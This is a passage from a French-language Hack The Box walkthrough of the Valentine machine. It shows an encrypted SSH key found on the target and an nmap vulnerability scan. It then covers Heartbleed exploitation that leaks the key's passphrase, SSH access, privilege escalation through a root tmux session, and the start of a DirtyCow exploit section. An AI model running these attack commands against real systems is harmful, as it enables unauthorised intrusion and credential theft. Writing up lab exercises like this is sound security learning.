class="m">46</span> 4b <span class="m">46</span> 4c <span class="m">36</span> <span class="m">70</span> <span class="m">71</span> <span class="m">70</span> <span class="m">75</span> <span class="m">58</span> 0d 0a <span class="m">63</span> <span class="m">59</span> <span class="m">35</span> <span class="m">59</span> 5a 4a <span class="m">47</span> <span class="m">41</span> <span class="m">70</span> 2b 4a <span class="m">78</span> <span class="m">73</span> 6e <span class="m">49</span> <span class="m">51</span> <span class="m">39</span> <span class="m">43</span> <span class="m">46</span> <span class="m">79</span> <span class="m">78</span> <span class="m">49</span> <span class="m">74</span> <span class="m">39</span> <span class="m">32</span> <span class="m">66</span> <span class="m">72</span> <span class="m">58</span> 7a 6e <span class="m">73</span> 6a <span class="m">68</span> 6c <span class="m">59</span> <span class="m">61</span> <span class="m">38</span> <span class="m">73</span> <span class="m">76</span> <span class="m">62</span> <span class="m">56</span> 4e 4e <span class="m">66</span> 6b 2f <span class="m">39</span> <span class="m">66</span> <span class="m">79</span> <span class="m">58</span> <span class="m">36</span> 6f <span class="m">70</span> <span class="m">32</span> <span class="m">34</span> <span class="m">72</span> 4c <span class="m">32</span> <span class="m">44</span> <span class="m">79</span> <span class="m">45</span> <span class="m">53</span> <span class="m">70</span> <span class="m">59</span> 0d 0a <span class="m">70</span> 6e <span class="m">73</span> <span class="m">75</span> 6b <span class="m">42</span> <span class="m">43</span> <span class="m">46</span> <span class="m">42</span> 6b 5a <span class="m">48</span> <span class="m">57</span> 4e 4e <span class="m">79</span> <span class="m">65</span> 4e <span class="m">37</span> <span class="m">62</span> <span class="m">35</span> <span class="m">47</span> <span class="m">68</span> <span class="m">54</span> <span class="m">56</span> <span class="m">43</span> 6f <span class="m">64</span> <span class="m">48</span> <span class="m">68</span> 7a <span class="m">48</span> <span class="m">56</span> <span class="m">46</span> <span class="m">65</span> <span class="m">68</span> <span class="m">54</span> <span class="m">75</span> <span class="m">42</span> <span class="m">72</span> <span class="m">70</span> 2b <span class="m">56</span> <span class="m">75</span> <span class="m">50</span> <span class="m">71</span> <span class="m">61</span> <span class="m">71</span> <span class="m">44</span> <span class="m">76</span> 4d <span class="m">43</span> <span class="m">56</span> <span class="m">65</span> <span class="m">31</span> <span class="m">44</span> 5a <span class="m">43</span> <span class="m">62</span> <span class="m">34</span> 4d 6a <span class="m">41</span> 6a 0d 0a 4d <span class="m">73</span> 6c <span class="m">66</span> 2b <span class="m">39</span> <span class="m">78</span> 4b 2b <span class="m">54</span> <span class="m">58</span> <span class="m">45</span> 4c <span class="m">33</span> <span class="m">69</span> <span class="m">63</span> 6d <span class="m">49</span> 4f <span class="m">42</span> <span class="m">52</span> <span class="m">64</span> <span class="m">50</span> <span class="m">79</span> <span class="m">77</span> <span class="m">36</span> <span class="m">65</span> 2f 4a 6c <span class="m">51</span> 6c <span class="m">56</span> <span class="m">52</span> 6c 6d <span class="m">53</span> <span class="m">68</span> <span class="m">46</span> <span class="m">70</span> <span class="m">49</span> <span class="m">38</span> <span class="m">65</span> <span class="m">62</span> 2f <span class="m">38</span> <span class="m">56</span> <span class="m">73</span> <span class="m">54</span> <span class="m">79</span> 4a <span class="m">53</span> <span class="m">65</span> 2b <span class="m">62</span> <span class="m">38</span> <span class="m">35</span> <span class="m">33</span> 7a <span class="m">75</span> <span class="m">56</span> <span class="m">32</span> <span class="m">71</span> 4c 0d 0a <span class="m">73</span> <span class="m">75</span> 4c <span class="m">61</span> <span class="m">42</span> 4d <span class="m">78</span> <span class="m">59</span> 4b 6d <span class="m">33</span> 2b 7a <span class="m">45</span> <span class="m">44</span> <span class="m">49</span> <span class="m">44</span> <span class="m">76</span> <span class="m">65</span> 4b <span class="m">50</span> 4e <span class="m">61</span> <span class="m">61</span> <span class="m">57</span> 5a <span class="m">67</span> <span class="m">45</span> <span class="m">63</span> <span class="m">71</span> <span class="m">78</span> <span class="m">79</span> 6c <span class="m">43</span> <span class="m">43</span> 2f <span class="m">77</span> <span class="m">55</span> <span class="m">79</span> <span class="m">55</span> <span class="m">58</span> 6c 4d 4a <span class="m">35</span> <span class="m">30</span> 4e <span class="m">77</span> <span class="m">36</span> 4a 4e <span class="m">56</span> 4d 4d <span class="m">38</span> 4c <span class="m">65</span> <span class="m">43</span> <span class="m">69</span> <span class="m">69</span> <span class="m">33</span> 4f <span class="m">45</span> <span class="m">57</span> 0d 0a 6c <span class="m">30</span> 6c 6e <span class="m">39</span> 4c <span class="m">31</span> <span class="m">62</span> 2f 4e <span class="m">58</span> <span class="m">70</span> <span class="m">48</span> 6a <span class="m">47</span> <span class="m">61</span> <span class="m">38</span> <span class="m">57</span> <span class="m">48</span> <span class="m">48</span> <span class="m">54</span> 6a 6f <span class="m">49</span> <span class="m">69</span> 6c <span class="m">42</span> <span class="m">35</span> <span class="m">71</span> 4e <span class="m">55</span> <span class="m">79</span> <span class="m">79</span> <span class="m">77</span> <span class="m">53</span> <span class="m">65</span> <span class="m">54</span> <span class="m">42</span> <span class="m">46</span> <span class="m">32</span> <span class="m">61</span> <span class="m">77</span> <span class="m">52</span> 6c <span class="m">58</span> <span class="m">48</span> <span class="m">39</span> <span class="m">42</span> <span class="m">72</span> 6b 5a <span class="m">47</span> <span class="m">34</span> <span class="m">46</span> <span class="m">63</span> <span class="m">34</span> <span class="m">67</span> <span class="m">64</span> 6d <span class="m">57</span> 2f <span class="m">49</span> 7a <span class="m">54</span> 0d 0a <span class="m">52</span> <span class="m">55</span> <span class="m">67</span> 5a 6b <span class="m">62</span> 4d <span class="m">51</span> 5a 4e <span class="m">49</span> <span class="m">49</span> <span class="m">66</span> 7a 6a <span class="m">31</span> <span class="m">51</span> <span class="m">75</span> <span class="m">69</span> 6c <span class="m">52</span> <span class="m">56</span> <span class="m">42</span> 6d 2f <span class="m">46</span> <span class="m">37</span> <span class="m">36</span> <span class="m">59</span> 2f <span class="m">59</span> 4d <span class="m">72</span> 6d 6e 4d <span class="m">39</span> 6b 2f <span class="m">31</span> <span class="m">78</span> <span class="m">53</span> <span class="m">47</span> <span class="m">49</span> <span class="m">73</span> 6b <span class="m">77</span> <span class="m">43</span> <span class="m">55</span> <span class="m">51</span> 2b <span class="m">39</span> <span class="m">35</span> <span class="m">43</span> <span class="m">47</span> <span class="m">48</span> 4a <span class="m">45</span> <span class="m">38</span> 4d 6b <span class="m">68</span> <span class="m">44</span> <span class="m">33</span> 0d 0a 2d 2d 2d 2d 2d <span class="m">45</span> 4e <span class="m">44</span> <span class="m">20</span> <span class="m">52</span> <span class="m">53</span> <span class="m">41</span> <span class="m">20</span> <span class="m">50</span> <span class="m">52</span> <span class="m">49</span> <span class="m">56</span> <span class="m">41</span> <span class="m">54</span> <span class="m">45</span> <span class="m">20</span> 4b <span class="m">45</span> <span class="m">59</span> 2d 2d 2d 2d 2d </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl">------------------------------------ </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl">-----BEGIN RSA PRIVATE KEY----- </span></span><span class="line"><span class="cl">Proc-Type: 4,ENCRYPTED </span></span><span class="line"><span class="cl">DEK-Info: AES-128-CBC,AEB88C140F69BF2074788DE24AE48D46 </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl">DbPrO78kegNuk1DAqlAN5jbjXv0PPsog3jdbMFS8iE9p3UOL0lF0xf7PzmrkDa8R </span></span><span class="line"><span class="cl">5y/b46+9nEpCMfTPhNuJRcW2U2gJcOFH+9RJDBC5UJMUS1/gjB/7/My00Mwx+aI6 </span></span><span class="line"><span class="cl">0EI0SbOYUAV1W4EV7m96QsZjrwJvnjVafm6VsKaTPBHpugcASvMqz76W6abRZeXi </span></span><span class="line"><span class="cl">Ebw66hjFmAu4AzqcM/kigNRFPYuNiXrXs1w/deLCqCJ+Ea1T8zlas6fcmhM8A+8P </span></span><span class="line"><span class="cl">OXBKNe6l17hKaT6wFnp5eXOaUIHvHnvO6ScHVWRrZ70fcpcpimL1w13Tgdd2AiGd </span></span><span class="line"><span class="cl">pHLJpYUII5PuO6x+LS8n1r/GWMqSOEimNRD1j/59/4u3ROrTCKeo9DsTRqs2k1SH </span></span><span class="line"><span class="cl">QdWwFwaXbYyT1uxAMSl5Hq9OD5HJ8G0R6JI5RvCNUQjwx0FITjjMjnLIpxjvfq+E </span></span><span class="line"><span class="cl">p0gD0UcylKm6rCZqacwnSddHW8W3LxJmCxdxW5lt5dPjAkBYRUnl91ESCiD4Z+uC </span></span><span class="line"><span class="cl">Ol6jLFD2kaOLfuyee0fYCb7GTqOe7EmMB3fGIwSdW8OC8NWTkwpjc0ELblUa6ulO </span></span><span class="line"><span class="cl">t9grSosRTCsZd14OPts4bLspKxMMOsgnKloXvnlPOSwSpWy9Wp6y8XX8+F40rxl5 </span></span><span class="line"><span class="cl">XqhDUBhyk1C3YPOiDuPOnMXaIpe1dgb0NdD1M9ZQSNULw1DHCGPP4JSSxX7BWdDK </span></span><span class="line"><span class="cl">aAnWJvFglA4oFBBVA8uAPMfV2XFQnjwUT5bPLC65tFstoRtTZ1uSruai27kxTnLQ </span></span><span class="line"><span class="cl">+wQ87lMadds1GQNeGsKSf8R/rsRKeeKcilDePCjeaLqtqxnhNoFtg0Mxt6r2gb1E </span></span><span class="line"><span class="cl">AloQ6jg5Tbj5J7quYXZPylBljNp9GVpinPc3KpHttvgbptfiWEEsZYn5yZPhUr9Q </span></span><span class="line"><span class="cl">r08pkOxArXE2dj7eX+bq65635OJ6TqHbAlTQ1Rs9PulrS7K4SLX7nY89/RZ5oSQe </span></span><span class="line"><span class="cl">2VWRyTZ1FfngJSsv9+Mfvz341lbzOIWmk7WfEcWcHc16n9V0IbSNALnjThvEcPky </span></span><span class="line"><span class="cl">e1BsfSbsf9FguUZkgHAnnfRKkGVG1OVyuwc/LVjmbhZzKwLhaZRNd8HEM86fNojP </span></span><span class="line"><span class="cl">09nVjTaYtWUXk0Si1W02wbu1NzL+1Tg9IpNyISFCFYjSqiyG+WU7IwK3YU5kp3CC </span></span><span class="line"><span class="cl">dYScz63Q2pQafxfSbuv4CMnNpdirVKEo5nRRfK/iaL3X1R3DxV8eSYFKFL6pqpuX </span></span><span class="line"><span class="cl">cY5YZJGAp+JxsnIQ9CFyxIt92frXznsjhlYa8svbVNNfk/9fyX6op24rL2DyESpY </span></span><span class="line"><span class="cl">pnsukBCFBkZHWNNyeN7b5GhTVCodHhzHVFehTuBrp+VuPqaqDvMCVe1DZCb4MjAj </span></span><span class="line"><span class="cl">Mslf+9xK+TXEL3icmIOBRdPyw6e/JlQlVRlmShFpI8eb/8VsTyJSe+b853zuV2qL </span></span><span class="line"><span class="cl">suLaBMxYKm3+zEDIDveKPNaaWZgEcqxylCC/wUyUXlMJ50Nw6JNVMM8LeCii3OEW </span></span><span class="line"><span class="cl">l0ln9L1b/NXpHjGa8WHHTjoIilB5qNUyywSeTBF2awRlXH9BrkZG4Fc4gdmW/IzT </span></span><span class="line"><span class="cl">RUgZkbMQZNIIfzj1QuilRVBm/F76Y/YMrmnM9k/1xSGIskwCUQ+95CGHJE8MkhD3 </span></span><span class="line"><span class="cl">-----END RSA PRIVATE KEY----- </span></span></code></pre></td></tr></table> </div> </div><h3 id="heartbleed-vulnerability">Heartbleed Vulnerability </h3><p>On découvre une grosse vulnérabilité grâce à <strong>nmap &ndash;script</strong>.</p> <h3 id="nmap-script">nmap &ndash;script </h3><div class="highlight"><div class="chroma"> <table class="lntable"><tr><td class="lntd"> <pre tabindex="0" class="chroma"><code><span class="lnt"> 1 </span><span class="lnt"> 2 </span><span class="lnt"> 3 </span><span class="lnt"> 4 </span><span class="lnt"> 5 </span><span class="lnt"> 6 </span><span class="lnt"> 7 </span><span class="lnt"> 8 </span><span class="lnt"> 9 </span><span class="lnt">10 </span><span class="lnt">11 </span><span class="lnt">12 </span><span class="lnt">13 </span><span class="lnt">14 </span><span class="lnt">15 </span><span class="lnt">16 </span><span class="lnt">17 </span><span class="lnt">18 </span><span class="lnt">19 </span><span class="lnt">20 </span><span class="lnt">21 </span><span class="lnt">22 </span><span class="lnt">23 </span><span class="lnt">24 </span><span class="lnt">25 </span><span class="lnt">26 </span><span class="lnt">27 </span><span class="lnt">28 </span><span class="lnt">29 </span><span class="lnt">30 </span><span class="lnt">31 </span><span class="lnt">32 </span><span class="lnt">33 </span><span class="lnt">34 </span><span class="lnt">35 </span><span class="lnt">36 </span><span class="lnt">37 </span><span class="lnt">38 </span><span class="lnt">39 </span><span class="lnt">40 </span><span class="lnt">41 </span><span class="lnt">42 </span><span class="lnt">43 </span><span class="lnt">44 </span><span class="lnt">45 </span><span class="lnt">46 </span><span class="lnt">47 </span><span class="lnt">48 </span><span class="lnt">49 </span><span class="lnt">50 </span><span class="lnt">51 </span><span class="lnt">52 </span><span class="lnt">53 </span><span class="lnt">54 </span><span class="lnt">55 </span><span class="lnt">56 </span><span class="lnt">57 </span><span class="lnt">58 </span><span class="lnt">59 </span><span class="lnt">60 </span><span class="lnt">61 </span><span class="lnt">62 </span><span class="lnt">63 </span><span class="lnt">64 </span><span class="lnt">65 </span><span class="lnt">66 </span><span class="lnt">67 </span><span class="lnt">68 </span></code></pre></td> <td class="lntd"> <pre tabindex="0" class="chroma"><code class="language-bash" data-lang="bash"><span class="line"><span class="cl">┌──<span class="o">(</span>kali㉿kali<span class="o">)</span>-<span class="o">[</span>~<span class="o">]</span> </span></span><span class="line"><span class="cl">└─$ nmap --script vuln 10.10.10.79 </span></span><span class="line"><span class="cl">Starting Nmap 7.94SVN <span class="o">(</span> https://nmap.org <span class="o">)</span> at 2025-02-09 17:54 EST </span></span><span class="line"><span class="cl">Nmap scan report <span class="k">for</span> 10.10.10.79 </span></span><span class="line"><span class="cl">Host is up <span class="o">(</span>0.077s latency<span class="o">)</span>. </span></span><span class="line"><span class="cl">Not shown: <span class="m">997</span> closed tcp ports <span class="o">(</span>conn-refused<span class="o">)</span> </span></span><span class="line"><span class="cl">PORT STATE SERVICE </span></span><span class="line"><span class="cl">22/tcp open ssh </span></span><span class="line"><span class="cl">80/tcp open http </span></span><span class="line"><span class="cl"><span class="p">|</span>_http-vuln-cve2017-1001000: ERROR: Script execution failed <span class="o">(</span>use -d to debug<span class="o">)</span> </span></span><span class="line"><span class="cl"><span class="p">|</span>_http-csrf: Couldn<span class="s1">&#39;t find any CSRF vulnerabilities. </span></span></span><span class="line"><span class="cl"><span class="s1">|_http-dombased-xss: Couldn&#39;</span>t find any DOM based XSS. </span></span><span class="line"><span class="cl"><span class="p">|</span>_http-stored-xss: Couldn<span class="s1">&#39;t find any stored XSS vulnerabilities. </span></span></span><span class="line"><span class="cl"><span class="s1">| http-enum: </span></span></span><span class="line"><span class="cl"><span class="s1">| /dev/: Potentially interesting directory w/ listing on &#39;</span>apache/2.2.22 <span class="o">(</span>ubuntu<span class="o">)</span><span class="s1">&#39; </span></span></span><span class="line"><span class="cl"><span class="s1">|_ /index/: Potentially interesting folder </span></span></span><span class="line"><span class="cl"><span class="s1">443/tcp open https </span></span></span><span class="line"><span class="cl"><span class="s1">|_http-csrf: Couldn&#39;</span>t find any CSRF vulnerabilities. </span></span><span class="line"><span class="cl"><span class="p">|</span> ssl-heartbleed: </span></span><span class="line"><span class="cl"><span class="p">|</span> VULNERABLE: </span></span><span class="line"><span class="cl"><span class="p">|</span> The Heartbleed Bug is a serious vulnerability in the popular OpenSSL cryptographic software library. It allows <span class="k">for</span> stealing information intended to be protected by SSL/TLS encryption. </span></span><span class="line"><span class="cl"><span class="p">|</span> State: VULNERABLE </span></span><span class="line"><span class="cl"><span class="p">|</span> Risk factor: High </span></span><span class="line"><span class="cl"><span class="p">|</span> OpenSSL versions 1.0.1 and 1.0.2-beta releases <span class="o">(</span>including 1.0.1f and 1.0.2-beta1<span class="o">)</span> of OpenSSL are affected by the Heartbleed bug. The bug allows <span class="k">for</span> reading memory of systems protected by the vulnerable OpenSSL versions and could allow <span class="k">for</span> disclosure of otherwise encrypted confidential information as well as the encryption keys themselves. </span></span><span class="line"><span class="cl"><span class="p">|</span> </span></span><span class="line"><span class="cl"><span class="p">|</span> References: </span></span><span class="line"><span class="cl"><span class="p">|</span> http://www.openssl.org/news/secadv_20140407.txt </span></span><span class="line"><span class="cl"><span class="p">|</span> https://cve.mitre.org/cgi-bin/cvename.cgi?name<span class="o">=</span>CVE-2014-0160 </span></span><span class="line"><span class="cl"><span class="p">|</span>_ http://cvedetails.com/cve/2014-0160/ </span></span><span class="line"><span class="cl"><span class="p">|</span>_http-stored-xss: Couldn<span class="s1">&#39;t find any stored XSS vulnerabilities. </span></span></span><span class="line"><span class="cl"><span class="s1">| ssl-poodle: </span></span></span><span class="line"><span class="cl"><span class="s1">| VULNERABLE: </span></span></span><span class="line"><span class="cl"><span class="s1">| SSL POODLE information leak </span></span></span><span class="line"><span class="cl"><span class="s1">| State: VULNERABLE </span></span></span><span class="line"><span class="cl"><span class="s1">| IDs: BID:70574 CVE:CVE-2014-3566 </span></span></span><span class="line"><span class="cl"><span class="s1">| The SSL protocol 3.0, as used in OpenSSL through 1.0.1i and other </span></span></span><span class="line"><span class="cl"><span class="s1">| products, uses nondeterministic CBC padding, which makes it easier </span></span></span><span class="line"><span class="cl"><span class="s1">| for man-in-the-middle attackers to obtain cleartext data via a </span></span></span><span class="line"><span class="cl"><span class="s1">| padding-oracle attack, aka the &#34;POODLE&#34; issue. </span></span></span><span class="line"><span class="cl"><span class="s1">| Disclosure date: 2014-10-14 </span></span></span><span class="line"><span class="cl"><span class="s1">| Check results: </span></span></span><span class="line"><span class="cl"><span class="s1">| TLS_RSA_WITH_AES_128_CBC_SHA </span></span></span><span class="line"><span class="cl"><span class="s1">| References: </span></span></span><span class="line"><span class="cl"><span class="s1">| https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-3566 </span></span></span><span class="line"><span class="cl"><span class="s1">| https://www.imperialviolet.org/2014/10/14/poodle.html </span></span></span><span class="line"><span class="cl"><span class="s1">| https://www.securityfocus.com/bid/70574 </span></span></span><span class="line"><span class="cl"><span class="s1">|_ https://www.openssl.org/~bodo/ssl-poodle.pdf </span></span></span><span class="line"><span class="cl"><span class="s1">| ssl-ccs-injection: </span></span></span><span class="line"><span class="cl"><span class="s1">| VULNERABLE: </span></span></span><span class="line"><span class="cl"><span class="s1">| SSL/TLS MITM vulnerability (CCS Injection) </span></span></span><span class="line"><span class="cl"><span class="s1">| State: VULNERABLE </span></span></span><span class="line"><span class="cl"><span class="s1">| Risk factor: High </span></span></span><span class="line"><span class="cl"><span class="s1">| OpenSSL before 0.9.8za, 1.0.0 before 1.0.0m, and 1.0.1 before 1.0.1h </span></span></span><span class="line"><span class="cl"><span class="s1">| does not properly restrict processing of ChangeCipherSpec messages, </span></span></span><span class="line"><span class="cl"><span class="s1">| which allows man-in-the-middle attackers to trigger use of a zero </span></span></span><span class="line"><span class="cl"><span class="s1">| length master key in certain OpenSSL-to-OpenSSL communications, and </span></span></span><span class="line"><span class="cl"><span class="s1">| consequently hijack sessions or obtain sensitive information, via </span></span></span><span class="line"><span class="cl"><span class="s1">| a crafted TLS handshake, aka the &#34;CCS Injection&#34; vulnerability. </span></span></span><span class="line"><span class="cl"><span class="s1">| </span></span></span><span class="line"><span class="cl"><span class="s1">| References: </span></span></span><span class="line"><span class="cl"><span class="s1">| http://www.cvedetails.com/cve/2014-0224 </span></span></span><span class="line"><span class="cl"><span class="s1">| http://www.openssl.org/news/secadv_20140605.txt </span></span></span><span class="line"><span class="cl"><span class="s1">|_ https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-0224 </span></span></span><span class="line"><span class="cl"><span class="s1">| http-enum: </span></span></span><span class="line"><span class="cl"><span class="s1">| /dev/: Potentially interesting directory w/ listing on &#39;</span>apache/2.2.22 <span class="o">(</span>ubuntu<span class="o">)</span><span class="s1">&#39; </span></span></span><span class="line"><span class="cl"><span class="s1">|_ /index/: Potentially interesting folder </span></span></span><span class="line"><span class="cl"><span class="s1">|_http-dombased-xss: Couldn&#39;</span>t find any DOM based XSS. </span></span><span class="line"><span class="cl"><span class="p">|</span>_http-vuln-cve2017-1001000: ERROR: Script execution failed <span class="o">(</span>use -d to debug<span class="o">)</span> </span></span></code></pre></td></tr></table> </div> </div><h3 id="heartbleed-attack">heartbleed attack </h3><p>En utilisant un script python, on peut exploiter l&rsquo;attaque heartbleed et trouver des infos. On récupère notamment une chaine base64 contenant le mot de passe de la clé ssh trouvé précédemment.</p> <div class="highlight"><div class="chroma"> <table class="lntable"><tr><td class="lntd"> <pre tabindex="0" class="chroma"><code><span class="lnt"> 1 </span><span class="lnt"> 2 </span><span class="lnt"> 3 </span><span class="lnt"> 4 </span><span class="lnt"> 5 </span><span class="lnt"> 6 </span><span class="lnt"> 7 </span><span class="lnt"> 8 </span><span class="lnt"> 9 </span><span class="lnt">10 </span><span class="lnt">11 </span><span class="lnt">12 </span></code></pre></td> <td class="lntd"> <pre tabindex="0" class="chroma"><code class="language-bash" data-lang="bash"><span class="line"><span class="cl">┌──<span class="o">(</span>kali㉿kali<span class="o">)</span>-<span class="o">[</span>~/htb/Valentine/heartbleed-poc<span class="o">]</span> </span></span><span class="line"><span class="cl">└─$ python2 ./heartbleed-poc.py 10.10.10.79 <span class="p">|</span> sleep <span class="m">1</span> <span class="p">|</span> cat dump.bin <span class="p">|</span> grep -ia <span class="s1">&#39;==&#39;</span> -A5 -B5 </span></span><span class="line"><span class="cl"><span class="m">42</span> </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl">▒ </span></span><span class="line"><span class="cl"><span class="c1">##0.0.1/decode.php</span> </span></span><span class="line"><span class="cl">Content-Type: application/x-www-form-urlencoded </span></span><span class="line"><span class="cl">Content-Length: <span class="m">42</span> </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl"><span class="nv">$text</span><span class="o">=</span><span class="nv">aGVhcnRibGVlZGJlbGlldmV0aGVoeXBlCg</span><span class="o">==</span> </span></span><span class="line"><span class="cl">W��׼�K�o�s!J�P<span class="o">[</span> </span></span><span class="line"><span class="cl">... </span></span></code></pre></td></tr></table> </div> </div><p>On décode le base64</p> <div class="highlight"><div class="chroma"> <table class="lntable"><tr><td class="lntd"> <pre tabindex="0" class="chroma"><code><span class="lnt">1 </span><span class="lnt">2 </span><span class="lnt">3 </span></code></pre></td> <td class="lntd"> <pre tabindex="0" class="chroma"><code class="language-bash" data-lang="bash"><span class="line"><span class="cl">┌──<span class="o">(</span>kali㉿kali<span class="o">)</span>-<span class="o">[</span>~/htb/Valentine/heartbleed-poc<span class="o">]</span> </span></span><span class="line"><span class="cl">└─$ <span class="nb">echo</span> -n <span class="s2">&#34;aGVhcnRibGVlZGJlbGlldmV0aGVoeXBlCg==&#34;</span> <span class="p">|</span> base64 -d </span></span><span class="line"><span class="cl">heartbleedbelievethehype </span></span></code></pre></td></tr></table> </div> </div><p>On déchiffré la clé définitivement pour ne plus avoir a taper le mot de passe:</p> <div class="highlight"><div class="chroma"> <table class="lntable"><tr><td class="lntd"> <pre tabindex="0" class="chroma"><code><span class="lnt">1 </span><span class="lnt">2 </span><span class="lnt">3 </span></code></pre></td> <td class="lntd"> <pre tabindex="0" class="chroma"><code class="language-bash" data-lang="bash"><span class="line"><span class="cl">┌──<span class="o">(</span>kali㉿kali<span class="o">)</span>-<span class="o">[</span>~/htb/Valentine<span class="o">]</span> </span></span><span class="line"><span class="cl">└─$ openssl rsa -in hype.key -out hype.decrypted_key -passin pass:heartbleedbelievethehype </span></span><span class="line"><span class="cl">writing RSA key </span></span></code></pre></td></tr></table> </div> </div><h3 id="ssh-hype--user-flag">SSH hype | user flag </h3><div class="highlight"><div class="chroma"> <table class="lntable"><tr><td class="lntd"> <pre tabindex="0" class="chroma"><code><span class="lnt"> 1 </span><span class="lnt"> 2 </span><span class="lnt"> 3 </span><span class="lnt"> 4 </span><span class="lnt"> 5 </span><span class="lnt"> 6 </span><span class="lnt"> 7 </span><span class="lnt"> 8 </span><span class="lnt"> 9 </span><span class="lnt">10 </span><span class="lnt">11 </span><span class="lnt">12 </span><span class="lnt">13 </span></code></pre></td> <td class="lntd"> <pre tabindex="0" class="chroma"><code class="language-bash" data-lang="bash"><span class="line"><span class="cl">┌──<span class="o">(</span>kali㉿kali<span class="o">)</span>-<span class="o">[</span>~/htb/Valentine<span class="o">]</span> </span></span><span class="line"><span class="cl">└─$ ssh -o <span class="nv">PubkeyAcceptedKeyTypes</span><span class="o">=</span>ssh-rsa -i hype.key hype@10.10.10.79 </span></span><span class="line"><span class="cl">Enter passphrase <span class="k">for</span> key <span class="s1">&#39;hype.key&#39;</span>: </span></span><span class="line"><span class="cl">Welcome to Ubuntu 12.04 LTS <span class="o">(</span>GNU/Linux 3.2.0-23-generic x86_64<span class="o">)</span> </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl"> * Documentation: https://help.ubuntu.com/ </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl">New release <span class="s1">&#39;14.04.5 LTS&#39;</span> available. </span></span><span class="line"><span class="cl">Run <span class="s1">&#39;do-release-upgrade&#39;</span> to upgrade to it. </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl">Last login: Fri Feb <span class="m">16</span> 14:50:29 <span class="m">2018</span> from 10.10.14.3 </span></span><span class="line"><span class="cl">hype@Valentine:~$ cat user.txt </span></span><span class="line"><span class="cl">7b7f.....1de5 </span></span></code></pre></td></tr></table> </div> </div><h2 id="privilege-escalation">Privilege escalation </h2><h3 id="bash_history">.bash_history </h3><p>On observe qu&rsquo;il existe un dossier &ldquo;/.devs/&rdquo; contenant une session de terminal tmux &ldquo;/.devs/dev_sess&rdquo;.</p> <div class="highlight"><div class="chroma"> <table class="lntable"><tr><td class="lntd"> <pre tabindex="0" class="chroma"><code><span class="lnt"> 1 </span><span class="lnt"> 2 </span><span class="lnt"> 3 </span><span class="lnt"> 4 </span><span class="lnt"> 5 </span><span class="lnt"> 6 </span><span class="lnt"> 7 </span><span class="lnt"> 8 </span><span class="lnt"> 9 </span><span class="lnt">10 </span><span class="lnt">11 </span><span class="lnt">12 </span><span class="lnt">13 </span><span class="lnt">14 </span><span class="lnt">15 </span></code></pre></td> <td class="lntd"> <pre tabindex="0" class="chroma"><code class="language-bash" data-lang="bash"><span class="line"><span class="cl">hype@Valentine:~$ cat .bash_history </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl"><span class="nb">exit</span> </span></span><span class="line"><span class="cl">exot </span></span><span class="line"><span class="cl"><span class="nb">exit</span> </span></span><span class="line"><span class="cl">ls -la </span></span><span class="line"><span class="cl"><span class="nb">cd</span> / </span></span><span class="line"><span class="cl">ls -la </span></span><span class="line"><span class="cl"><span class="nb">cd</span> .devs </span></span><span class="line"><span class="cl">ls -la </span></span><span class="line"><span class="cl">tmux -L dev_sess </span></span><span class="line"><span class="cl">tmux a -t dev_sess </span></span><span class="line"><span class="cl">tmux --help </span></span><span class="line"><span class="cl">tmux -S /.devs/dev_sess </span></span><span class="line"><span class="cl"><span class="nb">exit</span> </span></span></code></pre></td></tr></table> </div> </div><h3 id="root-tmux-session---root-flag">Root tmux session - root flag </h3><div class="highlight"><div class="chroma"> <table class="lntable"><tr><td class="lntd"> <pre tabindex="0" class="chroma"><code><span class="lnt">1 </span><span class="lnt">2 </span><span class="lnt">3 </span><span class="lnt">4 </span><span class="lnt">5 </span></code></pre></td> <td class="lntd"> <pre tabindex="0" class="chroma"><code class="language-bash" data-lang="bash"><span class="line"><span class="cl">hype@Valentine:~$ tmux -S /.devs/dev_sess </span></span><span class="line"><span class="cl">root@Valentine:/home/hype# whoami </span></span><span class="line"><span class="cl">root </span></span><span class="line"><span class="cl">root@Valentine:/home/hype# cat /root/root.txt </span></span><span class="line"><span class="cl">ced9.....6598 </span></span></code></pre></td></tr></table> </div> </div><h2 id="privilege-escalation-2---dirtycow">Privilege escalation 2 - Dirtycow </h2><p>On peut aller sur ce lien pour voir une liste d&rsquo;exploit dirty cow possible <a class="link" href="https://github.com/dirtycow/dirtycow.github.io/wiki/PoCs" target="_blank" rel="noopener" >https://github.com/dirtycow/dirtycow.github.io/wiki/PoCs</a></p> <h3 id="dirtycow">dirtycow </h3><p>Voici celui qu&rsquo;on va executer : <a class="link" href="https://github.com/FireFart/dirtycow/blob/master/dirty.c" target="_blank" rel="noopener" >https://github.com/FireFart/dirtycow/blob/master/dirty.c</a></p> <p>&lsquo;Generates a new password hash on the fly and modifies /etc/passwd automatically. Just run and pwn.&rsquo;</p> <div class="highlight"><div class="chroma"> <table class="lntable"><tr><td class="lntd"> <pre tabindex="0" class="chroma"><code><span class="lnt"> 1 </span><span class="lnt"> 2 </span><span class="lnt"> 3 </span><span class="lnt"> 4 </span><span class="lnt"> 5 </span><span class="lnt"> 6 </span><span class="lnt"> 7 </span><span class="lnt"> 8 </span><span class="lnt"> 9 </span><span class="lnt">10 </span><span class="lnt">11 </span><span class="lnt">12 </span><span class="lnt">13 </span><span class="lnt">14 </span><span class="lnt">15 </span><span class="lnt">16 </span><span class="lnt">17 </span><span class="lnt">18 </span><span class="lnt">19 </span><span class="lnt">20 </span><span class="lnt">21 </span><span class="lnt">22 </span><span class="lnt">23 </span><span class="lnt">24 </span><span class="lnt">25 </span><span class="lnt">26 </span><span class="lnt">27 </span><span class="lnt">28 </span><span class="lnt">29 </span><span class="lnt">30 </span><span class="lnt">31 </span><span class="lnt">32 </span><span class="lnt">33 </span><span class="lnt">34 </span><span class="lnt">35 </span><span class="lnt">36 </span><span class="lnt">37 </span><span class="lnt">38 </span><span class="lnt">39 </span><span class="lnt">40 </span><span class="lnt">41 </span><span class="lnt">42 </span><span class="lnt">43 </span><span class="lnt">44 </span><span class="lnt">45 </span><span 